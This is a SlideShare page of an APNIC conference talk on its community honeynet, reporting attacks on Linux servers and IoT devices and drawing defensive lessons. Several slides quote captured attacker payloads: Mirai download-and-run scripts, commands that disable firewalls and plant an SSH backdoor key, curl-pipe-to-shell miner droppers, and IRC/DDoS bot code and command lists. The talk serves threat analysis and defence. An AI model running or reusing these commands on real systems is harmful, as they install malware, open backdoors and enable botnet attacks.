SlideShare a Scribd company logo

IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project

APNIC
APNIC

The document discusses observations from the APNIC Community Honeynet Project, including Linux/Unix malware targeting servers and IoT devices, and lessons learned. Some key observations are the prevalence of Linux/Unix malware like Mirai that targets exposed devices with weak credentials. Honeypots captured login attempts and payloads downloaded from command and control servers. Lessons include the need to patch systems, use strong unique credentials, and monitor for infections.

1 of 38
Download to read offline
1 Observations and Lessons Learned from the APNIC Community Honeynet Project Adli Wahid Senior Internet Security Specialist, APNIC adli@apnic.net
2 2 Let’s Connect! LinkedIn: Adli Wahid Email: adli@apnic.net Twitter: @adliwahid PGP Key fingerprint = 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696
3 3 Talk Overview 1. APNIC Community Honeynet Project 2. Observations on activities targeting Linux servers and IoTs 3. Lessons Learned / Reflections
4 4 Overview of the APNIC Community Honeynet Project
5 5 APNIC Community Honeynet Project • Context – Educational – using honeypots for understanding network security attacks / threats, part of our network security training – Situational awareness, the bigger picture, cooperation with other stakeholders, tools (i.e. MISP threat sharing platform, Wireshark, Suricata, etc ) • Collaboration – Partners deploy honeypots, APNIC runs the backend – Information collected among partners & threat sharing* • Outcomes – More than 50 distributed honeypots* in AP region since 2017 – Share threat information for APNIC members, partners (i.e CERTs/CSIRTs, Network Operators) • https://blog.apnic.net/2020/07/09/apnic-community-honeynet-project-behind- the-scenes/ • https://dash.apnic.net 5
6 6 APNIC Community Honeypot 1. Purpose and Placement o Research & Alerting – Internet 2. Type of Honeypots o Cowrie, Dionaea, RDPHoney, 3. Deployment – Community Honey Network (fork of Modern Honey Network) – Partners & Self Hosting 4. Data Collection & Analysis & Action – Logs, Visualization, Alert, Action (Incident Response) – Elasticsearch, Kibana, Logstash, Beats – Suricata IDS – ElastAlert + Slack 5. Maintenance – Ansible – LibreNMS Detection with Suricata Rulesets Slack Alert
7 7 Community Honeynet Infrastructure hpfeeds hpfeeds CHN MHN Filebeats (json) Filebeats (json) Logstash TLS TLS ElasticSear ch BigQuery Elastalert Kibana honeypots Distributed honeypots MHN – Modern Honey Network CHN – Community HoneyNetwork
8 8 * Traffic from the last 30 days
9 9
10 10
11 Country View – Pakistan (Last 90 days)
12 Observations and Lessons Learned
13 13 Linux/Unix Malware • Routers / IoT devices / Servers run Linux / Unix based OS • Not new but pervasive – Targets are exposed on the Internet (http, telnet, ssh) – Unpatched / Unmonitored (i.e. no Anti Virus, firmware upgrades not applied) – Default/Weak credentials • Popular example – Mirai (ddos agent) – Source code was shared publicly – Many variants – josho, owari, masuta, sora etc – Gafgyt • Simple technique of infecting and spreading & persistence • Interesting Scenarios – Working from Home – Servers / Hosting / Cloud
14 14 Different Perspectives of a DDoS My Network / Infrastructure / Host Source Target / Victim Perspective Attacker Perspective x
15 15 Service & Attacker Infrastructure • Setting up the infrastructure • Misconfigured services – Servers - NTP, DNS, SSDP, etc – Amplification attack – Spoof source of request – https://stats.cybergreen.net/ – https://www.shadowserver.org/what-we- do/network-reporting/get-reports • Active bot “recruitment” – Internet exposed services – Vulnerable devices – Weak credentials
18 18 source Brute force: Username: admin password:12345 Remote Code Execution via Web interface Download Binary / Execute Scan and gain access Connect to Command and Control C & C “Recruitment Process” wget http://37.x.2x.190:80/13747243572475/hx86_64 2 1 Attacker
19 19 Telnet/SSH Honeypot (Cowrie) • Emulates SSH / Telnet – Allows attacker to log in • Emulates Linux/Unix environment – Captures command issued by attacker after login – Including download • ”Look and Feel” of Linux/Unix server and IoT devices • Attract certain class of attacks – Scan for SSH/Telnet – Bruteforce username/password – Login & execute payload(s) • Ddos Agents & Cryptominers – Based on post-login activities and binary collected Mirai sample – 2016
20 Successful Logins – New Honeypot { "eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:50.568233Z", "message": "login attempt [root/taZz@23495859] succeeded", "src_ip": "123.b.c.12", "session": "fd7977b0b54a", "password": "taZz@23495859", "sensor": "mn-001" } { "eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:59.378766Z", "message": "login attempt [root/taZz@23495859] succeeded", "src_ip": "80.x.y.62", "session": "fdcd399b1282", "password": "taZz@23495859", "sensor": "mn-001" } Check out: https://www.bankinfosecurity.com/botnets-keep-brute-forcing-internet-things-devices-a-
21 21 Execute Payload #!/bin/sh cd /tmp || cd /honme/$USER || cd /var/run || cd /mnt || cd /root || cd / wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; busybox wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; tftp -r mirai.mips -g 185.10.68.175; busybox tftp -r mirai.mips -g 185.10.68.175; chmod 777 mirai.mips; ./bins/mirai.mips; rm -rf mirai.mips
22 22 /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget - c http://116.211.145.29:8887/dx;chmod 777 dx;./dx;echo "cd /tmp/">>/etc/rc.local;echo "./dx&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5 O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJ e0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPe cjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8h Gmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKg AySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ echo -e "passwordn1o53kTj3yZq9n1o53kTj3yZq9"|passwd|bash system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://spacewb.tech/poll/bd54f492-5909-49dd-bf2e-efbe029383ce mode=http dst- path=7wmp0b4s.rscrn/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,wri te
23 my $process = $rps[rand scalar @rps]; my @rversion = ("Phl4nk"); my $vers = $rversion[rand scalar @rversion]; my @rircname = ("zombie"); my $ircname = $rircname[rand scalar @rircname]; chop (my $realname = $rircname[rand scalar @rircname]); my $nick =$rircname[rand scalar @rircname]; my $server = '125.x.y.z53'; my $port = '1947'; my $linas_max='8'; my $sleep='5'; my $homedir = "/tmp"; my $version = 'v.02'; my @admins = ("Nite","NiteMax","Nite123"); #my @hostauth = ("Nite"); my @channels = ("#VPS"); Perl Script command: uname -a & curl -O http://[xx].do.am/adm.txt ; perl adm.txt ; rm -rf adm.txt
24 24 if ($funcarg =~ /^flood/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Flood Help: "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); } if ($funcarg =~ /^utils/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Utils Help: sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <messa sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example) sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== }
25 * Non-spoof / non-root attacks: (can run on all bots) * * STD <ip> <port> <time> = A non spoof UDP HIV STD flooder * * HOLD <host> <port> <time> = A vanilla TCP connection flooder * * JUNK <host> <port> <time> = A vanilla TCP flooder (modded) * * UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non- spoof udp flooder * HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder * * * Spoof / root attacks: * * DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets. * * * Bot commands: * * AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. * * GETIP <iface> = gets the IP address from an interface * * FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port) * RNDNICK = Randomizes knight nickname * * NICK <nick> = Changes the nick of the client * * SERVER <server> = Changes servers * * GETSPOOFS = Gets the current spoofing * * SPOOFS <subnet> = Changes spoofing to a subnet * * DISABLE = Disables all packeting from the knight * * ENABLE = Enables all packeting from the knight * * KILL = Kills the knight * * GET <http address> <save as> = Downloads a file off the web * * VERSION = Requests version of knight * * KILLALL = Kills all current packeting * * HELP = Displays this * * IRC <command> = Sends this command to the server * * SH <command> = Executes a command * * BASH <command> = Run a bash command * * ISH <command> = Interactive SH (via privmsg) * * SHD <command> = Daemonize command * * INSTALL <http://server/bin> = Install binary (via wget) * * BINUPDATE <http://server/bin> = Update a binary (via wget) * * LOCKUP <http://server/bin> = Kill telnet, install a backdoor! * * * Source code of IRC based bot
26 26 Linux/Mirai – Fbot https://blog.malwaremustdie.org/2020/02/mmd-0065-2021- linuxmirai-fbot-re.html 2020-07-16T10:47:34.498718Z - URL seen http://5.x.y.228/bot.x86_64 on sensor 4da092c7-7234-48dc-a7ab- 7eb35979e847 and source ip: x.y.z.119 - ['root', 'juantech’] 2020-07-16T11:43:13.797645Z - http://5.x.y.228/bot.x86_64 on sensor f3fedbcf-e79e-44ef-9947-aca33701f8c2 and source ip: x.y.z.97 - ['root', 'hipc3518’]
27 27
28 Cryptominers / Cryptojacking
31 31 curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &
32 32 Snippet of shell script if [ ! -f "4d867bd38706a5f7" ]; then ARCH=$(getconf LONG_BIT) if [ ${ARCH}x = "64x" ]; then (curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -o 4d867bd38706a5f7 ||wget -T180 -q img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -O 4d867bd38706a5f7 ||curl -fsSL -m180 never.b-cdn.net/x64 -o 4d867bd38706a5f7 ||wget -T180 -q never.b-cdn.net/x64 -O 4d867bd38706a5f7 ||curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -o 4d867bd38706a5f7 ||wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -O 4d867bd38706a5f7)
33 33 Find hash related to URL serving Malware a5fba021a41c520a81647cda41110033eba 4f8842eb3239f227bcbb0b1b110d6
34 34
35 35 Rocke Gang 1. https://isc.sans.edu/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/ 24916 (May 2019) 2. https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box- mining-challengers (May 2019) 3. https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes- tactics-now-more-difficult-to-detect (Oct 2019) 4. https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to- evade-detection-by-cloud-security-products/ (Oct 2019)
36 36 www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o pool.minexmr.com:4444 -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaN R1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86Tfd Xi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )
37 37 Analysis - Interesting indicators • IP addresses of host for initial access, run script to download binary/malware – Normally compromised systems • IP addresses of host serving binary/malware + other artefacts • IP addresses/domains of command and control • Binaries, scripts, malware samples, source code (+ hashes) • Ssh keys, webshells, Group names, irc #channels • Miner related information • Correlate with other observations, reports, etc
38 38 Lessons Learned
39 39 Lessons Learned • Context how can we “ improve” security ? • Bad Practices o Telnet enabled by default on devices o Weak or default credentials not removed o Services not developed securely o Services not deployed securely (i.e. management interfaces shouldn’t be exposed on the Internet) o No action upon notification (not our device, it is the customers) • Miscreants will exploit the weaknesess & monetize
45 45 Source IP from TO 2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP address: x.z.y.56 src_port: 33903 dest_port: 23 ASN Info: XYZ , 38201 , x.z.y.0/21 AbuseIPDB
46 46 Back to the drawing Board? • Keeping the Internet safe and secure for _everyone_ • Education – Users, operators, developers • Governance – Incident Response – Roles and responsibilities – Accountabilities
48 Thank You! LinkedIn: Adli Wahid Email: adli@apnic.net Twitter: @adliwahid PGP: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696 https://www.unsplash.com/adliwahid

Recommended

"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
The DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsThe DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rolls
Men and Mice
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
SecuRing
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
RootedCON
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
Santiago Bassett
 
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsNew DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
OpenDNS
 
DNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsDNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing Solutions
Men and Mice
 
How to send DNS over anything encrypted
How to send DNS over anything encryptedHow to send DNS over anything encrypted
How to send DNS over anything encrypted
Men and Mice
 

Recommended

"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
The DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsThe DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rolls
Men and Mice
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
SecuRing
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
RootedCON
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
Santiago Bassett
 
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsNew DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
OpenDNS
 
DNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsDNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing Solutions
Men and Mice
 
How to send DNS over anything encrypted
How to send DNS over anything encryptedHow to send DNS over anything encrypted
How to send DNS over anything encrypted
Men and Mice
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
Xavier Mertens
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
MksYi
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Nahidul Kibria
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC Edition
Xavier Mertens
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
PROIDEA
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training Program
OpenDNS
 
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-broDefcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Priyanka Aash
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
Prathan Phongthiproek
 
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
OW2
 
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
OpenDNS
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
Francois Marier
 
Defcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internetDefcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internet
Priyanka Aash
 
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
Adel Karimi
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
DefCamp
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
Rob Gillen
 
Angler talk
Angler talkAngler talk
Angler talk
Artsiom Holub
 
Kamailio and VoIP Wild World
Kamailio and VoIP Wild WorldKamailio and VoIP Wild World
Kamailio and VoIP Wild World
Daniel-Constantin Mierla
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume Compromise
Zach Grace
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wire
InfoSec Addicts
 

More Related Content

What's hot

HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
Xavier Mertens
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
MksYi
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Nahidul Kibria
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC Edition
Xavier Mertens
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
PROIDEA
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training Program
OpenDNS
 
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-broDefcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Priyanka Aash
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
Prathan Phongthiproek
 
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
OW2
 
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
OpenDNS
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
Francois Marier
 
Defcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internetDefcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internet
Priyanka Aash
 
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
Adel Karimi
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
DefCamp
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
Rob Gillen
 
Angler talk
Angler talkAngler talk
Angler talk
Artsiom Holub
 
Kamailio and VoIP Wild World
Kamailio and VoIP Wild WorldKamailio and VoIP Wild World
Kamailio and VoIP Wild World
Daniel-Constantin Mierla
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume Compromise
Zach Grace
 

What's hot (20)

HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC Edition
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training Program
 
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-broDefcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
 
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
 
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
 
Defcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internetDefcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internet
 
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
 
Angler talk
Angler talkAngler talk
Angler talk
 
Kamailio and VoIP Wild World
Kamailio and VoIP Wild WorldKamailio and VoIP Wild World
Kamailio and VoIP Wild World
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume Compromise
 

Similar to IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project

Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wire
InfoSec Addicts
 
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
